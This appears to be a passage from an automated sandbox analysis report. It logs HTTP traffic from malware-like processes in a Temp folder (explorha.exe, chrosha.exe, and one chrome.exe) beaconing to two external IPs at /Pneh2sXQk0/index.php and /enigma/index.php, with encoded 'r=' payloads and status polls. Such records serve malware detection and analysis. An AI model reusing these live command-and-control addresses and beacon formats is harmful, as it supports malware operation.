                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      430192.168.2.550274193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.433562994 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.681734085 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      431192.168.2.550275193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.690999031 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.939593077 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      432192.168.2.550276193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.927830935 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:58.172730923 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      433192.168.2.550277193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:58.312855959 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:58.562668085 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      434192.168.2.550278193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:58.539184093 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:58.782886982 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      435192.168.2.550279193.233.132.16780412C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:58.815845966 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:59.070318937 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      436192.168.2.550280193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:59.035808086 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:59.284615040 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      437192.168.2.550281193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:59.432204962 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:59.676188946 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      438192.168.2.550282193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:59.663532019 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:59.916558027 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      439192.168.2.550283193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:59.926920891 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:00.176089048 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      440192.168.2.550284193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:00.172422886 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:00.428931952 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      441192.168.2.550285193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:00.538774014 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:00.780312061 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      442192.168.2.550286193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:00.793606043 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:01.045970917 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      443192.168.2.550287193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:01.033885002 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:01.286737919 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      444192.168.2.550288193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:01.298433065 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:01.551254988 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      445192.168.2.550289193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:01.651972055 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:01.902004957 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      446192.168.2.550290193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:01.913290977 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
